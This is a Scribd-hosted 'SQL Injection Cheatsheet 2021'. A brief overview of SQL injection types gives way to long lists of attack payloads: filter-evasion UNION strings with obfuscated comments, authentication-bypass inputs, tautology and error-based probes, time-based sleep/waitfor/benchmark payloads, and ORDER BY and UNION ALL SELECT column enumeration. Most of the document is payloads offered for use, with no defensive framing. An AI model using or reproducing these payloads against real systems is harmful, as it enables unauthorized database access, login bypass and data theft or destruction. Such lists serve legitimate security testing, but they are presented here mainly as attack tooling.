0% found this document useful (0 votes)

21 views55 pages

SQL Injection Cheatsheet 2021

The document provides a comprehensive SQL Injection (SQLi) cheatsheet detailing various types of SQL injection attacks, including In-band, Inferential, and Out-of-band SQLi. It outlines techniques such as Error-based and Union-based SQLi, along with specific payloads for authentication bypass and generic SQL injection. Additionally, it includes examples of time-based and union select payloads, emphasizing the risks and methods associated with SQL injection vulnerabilities.

Uploaded by

ak607111

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

21 views55 pages

SQL Injection Cheatsheet 2021

Uploaded by

ak607111

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 55

SQL Injection Cheatsheet 2021

hello Guys,

Today we have come with a sqli cheatsheet for you guys ........

SQL injection is one of the most common Website security Vulnerability. It is a

code injection vulnerability that might dump your database.

SQL injection attacks allow attackers to modify the identity, tamper with existing
data, allow the complete disclosure of all data on the system, destroy the data or
make it otherwise unavailable, and become administrators of the database server
including can read Insert, update and delete.

SQL injection attacks are a type of injection attack, in which SQL commands are
injected into data-plane input in order to effect the execution of predefined SQL
commands
Types of SQL Injection
In-band SQLi (Classic SQLi)

In-band SQL Injection is the most common and easy-to-exploit of SQL Injection
attacks. In-band SQL Injection occurs when an attacker is able to use the same
communication channel to both launch the attack and gather results. The two
most common types of in-band SQL Injection are Error-based SQLi and
Union-based SQLi.

Error-based SQLi

Error-based SQLi is an in-band SQL Injection technique that relies on error

messages thrown by the database server to obtain information about the
structure of the database. In some cases, error-based SQL injection alone is
enough for an attacker to enumerate an entire database.

Union-based SQLi

Union-based SQLi is an in-band SQL injection technique that leverages the UNION
SQL operator to combine the results of two or more SELECT statements into a
single result which is then returned as part of the HTTP response.

Inferential SQLi (Blind SQLi)

Inferential SQL Injection, unlike in-band SQLi, may take longer for an attacker to
exploit, however, it is just as dangerous as any other form of SQL Injection. In an
inferential SQLi attack, no data is actually transferred via the web application and
the attacker would not be able to see the result of an attack in-band (which is why
such attacks are commonly referred to as “blind SQL Injection attacks”).
Instead, an attacker is able to reconstruct the database structure by sending
payloads, observing the web application’s response and the resulting behavior of
the database server. The two types of inferential SQL Injection are
Blind-boolean-based SQLi and Blind-time-based SQLi.

Boolean-based (content-based)

Blind SQLi Boolean-based SQL Injection is an inferential SQL Injection technique

that relies on sending an SQL query to the database which forces the application
to return a different result depending on whether the query returns a TRUE or
FALSE result. Depending on the result, the content within the HTTP response will
change, or remain the same. This allows an attacker to infer if the payload used
returned true or false, even though no data from the database is returned.

Time-based Blind SQLi

Time-based SQL Injection is an inferential SQL Injection technique that relies on

sending an SQL query to the database which forces the database to wait for a
specified amount of time (in seconds) before responding. The response time will
indicate to the attacker whether the result of the query is TRUE or FALSE.
epending on the result, an HTTP response will be returned with a delay, or
returned immediately. This allows an attacker to infer if the payload used
returned true or false, even though no data from the database is returned.

Out-of-band SQLi

Out-of-band SQL Injection is not very common, mostly because it depends on

features being enabled on the database server being used by the web application.
Out-of-band SQL Injection occurs when an attacker is unable to use the same
channel to launch the attack and gather results. Out-of-band techniques, offer an
attacker an alternative to inferential time-based techniques, especially if the
server responses are not very stable (making an inferential time-based attack
unreliable).

Voice Based Sql Injection

It is a sql injection attack method that can be applied in applications that provide
access to databases with voice command. An attacker could pull information from
the database by sending sql queries with sound.

New Payloads

/*!50000un0x696fn*/+/*!12345AlL*/(/*!50000se0x6c65ct*/+1)

/*!50000%75%6e%69on*/ %73%65%6cect 1

/*!12345UnioN*//**/(/*!12345seLECT*//**/1)

/*!12345#qa%0A#%0AUnIOn*/(/*!12345#qa%0A#%0ASeleCt*//**/1)

{“param”:”1′)))+MySQL_payload–+-“}

SQLi Authentication Bypass

username: ‘–‘ / “–”

Password: ‘–‘ / “–”

Generic SQL Injection Cheatsheet

‘

“”

‘ or ”

— or #

‘ OR ‘1

‘ OR 1 — –

” OR “” = ”

” OR 1 = 1 — –
‘ OR ” = ‘

‘=’

‘LIKE’

‘=0–+

OR 1=1

‘ OR ‘x’=’x

‘ AND id IS NULL; —

””””””’UNION SELECT ‘2

%00

/*…*/

+ addition, concatenate (or space in url)

|| (double pipe) concatenate

% wildcard attribute indicator

# Numeric
AND 1

AND 0

AND true

AND false

1-false

1-true

1*56
-2

1′ ORDER BY 1–+

1′ ORDER BY 2–+

1′ ORDER BY 3–+

1′ ORDER BY 1,2–+

1′ ORDER BY 1,2,3–+

1′ GROUP BY 1,2,–+

1′ GROUP BY 1,2,3–+

‘ GROUP BY columnnames having 1=1 —

-1’ UNION SELECT 1,2,3–+

‘ UNION SELECT sum(columnname ) from tablename —

-1 UNION SELECT 1 INTO @,@

-1 UNION SELECT 1 INTO @,@,@

1 AND (SELECT * FROM Users) = 1

‘ AND MID(VERSION(),1,1) = ‘5’;

‘ and 1 in (select min(name) from sysobjects where xtype = ‘U’ and name > ‘.’) —

Finding the table name

Time-Based:

,(select * from (select(sleep(10)))a)

%2c(select%20*%20from%20(select(sleep(10)))a)

‘;WAITFOR DELAY ‘0:0:30’–

# Hash comment
/* C-style comment

— – SQL comment

;%00 Nullbyte

` Backtick

Generic Error Based Payloads

OR 1=1

OR 1=0

OR x=x
OR x=y

OR 1=1#

OR 1=0#

OR x=x#

OR x=y#

OR 1=1–

OR 1=0–

OR x=x–

OR x=y–

OR 3409=3409 AND (‘pytW’ LIKE ‘pytW

OR 3409=3409 AND (‘pytW’ LIKE ‘pytY

HAVING 1=1

HAVING 1=0

HAVING 1=1#

HAVING 1=0#

HAVING 1=1–

HAVING 1=0–

AND 1=1

AND 1=0

AND 1=1–

AND 1=0–

AND 1=1#
AND 1=0#

AND 1=1 AND ‘%’=’

AND 1=0 AND ‘%’=’

AND 1083=1083 AND (1427=1427

AND 7506=9091 AND (5913=5913

AND 1083=1083 AND (‘1427=1427

AND 7506=9091 AND (‘5913=5913

AND 7300=7300 AND ‘pKlZ’=’pKlZ

AND 7300=7300 AND ‘pKlZ’=’pKlY

AND 7300=7300 AND (‘pKlZ’=’pKlZ

AND 7300=7300 AND (‘pKlZ’=’pKlY

AS INJECTX WHERE 1=1 AND 1=1

AS INJECTX WHERE 1=1 AND 1=0

AS INJECTX WHERE 1=1 AND 1=1#

AS INJECTX WHERE 1=1 AND 1=0#

AS INJECTX WHERE 1=1 AND 1=1–

AS INJECTX WHERE 1=1 AND 1=0–

WHERE 1=1 AND 1=1

WHERE 1=1 AND 1=0

WHERE 1=1 AND 1=1#

WHERE 1=1 AND 1=0#

WHERE 1=1 AND 1=1–

WHERE 1=1 AND 1=0–

ORDER BY 1–

ORDER BY 2–

ORDER BY 3–

ORDER BY 4–

ORDER BY 5–

ORDER BY 6–

ORDER BY 7–

ORDER BY 8–

ORDER BY 9–

ORDER BY 10–

ORDER BY 11–

ORDER BY 12–

ORDER BY 13–

ORDER BY 14–

ORDER BY 15–

ORDER BY 16–

ORDER BY 17–

ORDER BY 18–

ORDER BY 19–

ORDER BY 20–

ORDER BY 21–
ORDER BY 22–

ORDER BY 23–

ORDER BY 24–

ORDER BY 25–

ORDER BY 26–

ORDER BY 27–

ORDER BY 28–

ORDER BY 29–

ORDER BY 30–

ORDER BY 31337–

ORDER BY 1#

ORDER BY 2#

ORDER BY 3#

ORDER BY 4#

ORDER BY 5#

ORDER BY 6#

ORDER BY 7#

ORDER BY 8#

ORDER BY 9#

ORDER BY 10#

ORDER BY 11#

ORDER BY 12#
ORDER BY 13#

ORDER BY 14#

ORDER BY 15#

ORDER BY 16#

ORDER BY 17#

ORDER BY 18#

ORDER BY 19#

ORDER BY 20#

ORDER BY 21#

ORDER BY 22#

ORDER BY 23#

ORDER BY 24#

ORDER BY 25#

ORDER BY 26#

ORDER BY 27#

ORDER BY 28#

ORDER BY 29#

ORDER BY 30#

ORDER BY 31337#

ORDER BY 1

ORDER BY 2

ORDER BY 3
ORDER BY 4

ORDER BY 5

ORDER BY 6

ORDER BY 7

ORDER BY 8

ORDER BY 9

ORDER BY 10

ORDER BY 11

ORDER BY 12

ORDER BY 13

ORDER BY 14

ORDER BY 15

ORDER BY 16

ORDER BY 17

ORDER BY 18

ORDER BY 19

ORDER BY 20

ORDER BY 21

ORDER BY 22

ORDER BY 23

ORDER BY 24

ORDER BY 25
ORDER BY 26

ORDER BY 27

ORDER BY 28

ORDER BY 29

ORDER BY 30

ORDER BY 31337

RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END))
AND ‘Txws’=’

RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END))
AND ‘Txws’=’

IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl–

IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl–

%’ AND 8310=8310 AND ‘%’=’

%’ AND 8310=8311 AND ‘%’=’

and (select substring(@@version,1,1))=’X’

and (select substring(@@version,1,1))=’M’

and (select substring(@@version,2,1))=’i’

and (select substring(@@version,2,1))=’y’

and (select substring(@@version,3,1))=’c’

and (select substring(@@version,3,1))=’S’

and (select substring(@@version,3,1))=’X’

Generic Time Based SQL Injection Payloads
# from wapiti

sleep(5)#

1 or sleep(5)#

” or sleep(5)#

‘ or sleep(5)#

” or sleep(5)=”

‘ or sleep(5)=’

1) or sleep(5)#

“) or sleep(5)=”

‘) or sleep(5)=’

1)) or sleep(5)#

“)) or sleep(5)=”

‘)) or sleep(5)=’

;waitfor delay ‘0:0:5’–

);waitfor delay ‘0:0:5’–

‘;waitfor delay ‘0:0:5’–

“;waitfor delay ‘0:0:5’–

‘);waitfor delay ‘0:0:5’–

“);waitfor delay ‘0:0:5’–

));waitfor delay ‘0:0:5’–

‘));waitfor delay ‘0:0:5’–

“));waitfor delay ‘0:0:5’–

benchmark(10000000,MD5(1))#

1 or benchmark(10000000,MD5(1))#

” or benchmark(10000000,MD5(1))#

‘ or benchmark(10000000,MD5(1))#

1) or benchmark(10000000,MD5(1))#

“) or benchmark(10000000,MD5(1))#

‘) or benchmark(10000000,MD5(1))#

1)) or benchmark(10000000,MD5(1))#

“)) or benchmark(10000000,MD5(1))#

‘)) or benchmark(10000000,MD5(1))#

pg_sleep(5)–

1 or pg_sleep(5)–

” or pg_sleep(5)–

‘ or pg_sleep(5)–

1) or pg_sleep(5)–

“) or pg_sleep(5)–

‘) or pg_sleep(5)–

1)) or pg_sleep(5)–

“)) or pg_sleep(5)–

‘)) or pg_sleep(5)–
AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND ‘vRxe’=’vRxe

AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND ‘%’=’

AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)

AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)–

AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#

SLEEP(5)#

SLEEP(5)–

SLEEP(5)=”

SLEEP(5)=’

or SLEEP(5)

or SLEEP(5)#

or SLEEP(5)–

or SLEEP(5)=”

or SLEEP(5)=’

waitfor delay ’00:00:05′

waitfor delay ’00:00:05′–

waitfor delay ’00:00:05’#

benchmark(50000000,MD5(1))

benchmark(50000000,MD5(1))–

benchmark(50000000,MD5(1))#

or benchmark(50000000,MD5(1))

or benchmark(50000000,MD5(1))–
or benchmark(50000000,MD5(1))#

pg_SLEEP(5)

pg_SLEEP(5)–

pg_SLEEP(5)#

or pg_SLEEP(5)

or pg_SLEEP(5)–

or pg_SLEEP(5)#

‘\”

AnD SLEEP(5)

AnD SLEEP(5)–

AnD SLEEP(5)#

&&SLEEP(5)

&&SLEEP(5)–

&&SLEEP(5)#

‘ AnD SLEEP(5) ANd ‘1

‘&&SLEEP(5)&&’1

ORDER BY SLEEP(5)

ORDER BY SLEEP(5)–

ORDER BY SLEEP(5)#

(SELECT * FROM (SELECT(SLEEP(5)))ecMj)

(SELECT * FROM (SELECT(SLEEP(5)))ecMj)#

(SELECT * FROM (SELECT(SLEEP(5)))ecMj)–

+benchmark(3200,SHA1(1))+’

+ SLEEP(10) + ‘

RANDOMBLOB(500000000/2)

AND 2947=LIKE(‘ABCDEFG’,UPPER(HEX(RANDOMBLOB(500000000/2))))

OR 2947=LIKE(‘ABCDEFG’,UPPER(HEX(RANDOMBLOB(500000000/2))))

RANDOMBLOB(1000000000/2)

AND 2947=LIKE(‘ABCDEFG’,UPPER(HEX(RANDOMBLOB(1000000000/2))))

OR 2947=LIKE(‘ABCDEFG’,UPPER(HEX(RANDOMBLOB(1000000000/2))))

SLEEP(1)/’ or SLEEP(1) or ‘” or SLEEP(1) or “/

Generic Union Select Payloads

ORDER BY SLEEP(5)

ORDER BY 1,SLEEP(5)

ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’))

ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4

ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5

ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6

ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7

ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8

ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9

ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11

ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12

ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13

ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1
8

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1
8,19

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1
8,19,20

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1
8,19,20,21

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1
8,19,20,21,22

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1
8,19,20,21,22,23

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1
8,19,20,21,22,23,24

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1
8,19,20,21,22,23,24,25

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1
8,19,20,21,22,23,24,25,26

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1
8,19,20,21,22,23,24,25,26,27

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1
8,19,20,21,22,23,24,25,26,27,28

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1
8,19,20,21,22,23,24,25,26,27,28,29

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1
8,19,20,21,22,23,24,25,26,27,28,29,30

ORDER BY SLEEP(5)#

ORDER BY 1,SLEEP(5)#

ORDER BY 1,SLEEP(5),3#

ORDER BY 1,SLEEP(5),3,4#
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5#

ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6#

ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7#

ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8#

ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9#

ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10#

ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11#

ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12#

ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13#

ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14#

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15#

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16#

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17#

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1
8#

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1
8,19#

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1
8,19,20#

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1
8,19,20,21#

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1
8,19,20,21,22#

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1
8,19,20,21,22,23#

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1
8,19,20,21,22,23,24#

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1
8,19,20,21,22,23,24,25#

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1
8,19,20,21,22,23,24,25,26#

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1
8,19,20,21,22,23,24,25,26,27#

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1
8,19,20,21,22,23,24,25,26,27,28#

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1
8,19,20,21,22,23,24,25,26,27,28,29#
ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1
8,19,20,21,22,23,24,25,26,27,28,29,30#

ORDER BY SLEEP(5)–

ORDER BY 1,SLEEP(5)–

ORDER BY 1,SLEEP(5),3–

ORDER BY 1,SLEEP(5),3,4–

ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5–

ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6–

ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7–

ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8–

ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9–

ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10–

ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11–

ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12–

ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13–

ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14–

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15–

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16–

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17–
ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1
8–

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1
8,19–

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1
8,19,20–

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1
8,19,20,21–

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1
8,19,20,21,22–

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1
8,19,20,21,22,23–

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1
8,19,20,21,22,23,24–

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1
8,19,20,21,22,23,24,25–

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1
8,19,20,21,22,23,24,25,26–

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1
8,19,20,21,22,23,24,25,26,27–

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1
8,19,20,21,22,23,24,25,26,27,28–

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1
8,19,20,21,22,23,24,25,26,27,28,29–

ORDER BY
1,SLEEP(5),BENCHMARK(1000000,MD5(‘A’)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1
8,19,20,21,22,23,24,25,26,27,28,29,30–

UNION ALL SELECT 1

UNION ALL SELECT 1,2

UNION ALL SELECT 1,2,3

UNION ALL SELECT 1,2,3,4

UNION ALL SELECT 1,2,3,4,5

UNION ALL SELECT 1,2,3,4,5,6

UNION ALL SELECT 1,2,3,4,5,6,7

UNION ALL SELECT 1,2,3,4,5,6,7,8

UNION ALL SELECT 1,2,3,4,5,6,7,8,9

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24

UNION ALL SELECT

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25

UNION ALL SELECT

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26

UNION ALL SELECT

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

UNION ALL SELECT

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28

UNION ALL SELECT

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29

UNION ALL SELECT

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30

UNION ALL SELECT 1#

UNION ALL SELECT 1,2#

UNION ALL SELECT 1,2,3#

UNION ALL SELECT 1,2,3,4#

UNION ALL SELECT 1,2,3,4,5#

UNION ALL SELECT 1,2,3,4,5,6#

UNION ALL SELECT 1,2,3,4,5,6,7#

UNION ALL SELECT 1,2,3,4,5,6,7,8#

UNION ALL SELECT 1,2,3,4,5,6,7,8,9#

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10#

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11#

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12#

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13#

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14#

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15#

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#

UNION ALL SELECT

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
UNION ALL SELECT
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#

UNION ALL SELECT

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#

UNION ALL SELECT

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#

UNION ALL SELECT

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#

UNION ALL SELECT

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#

UNION ALL SELECT

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#

UNION ALL SELECT 1–

UNION ALL SELECT 1,2–

UNION ALL SELECT 1,2,3–

UNION ALL SELECT 1,2,3,4–

UNION ALL SELECT 1,2,3,4,5–

UNION ALL SELECT 1,2,3,4,5,6–

UNION ALL SELECT 1,2,3,4,5,6,7–

UNION ALL SELECT 1,2,3,4,5,6,7,8–

UNION ALL SELECT 1,2,3,4,5,6,7,8,9–

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10–

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11–

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12–

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13–

UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14–

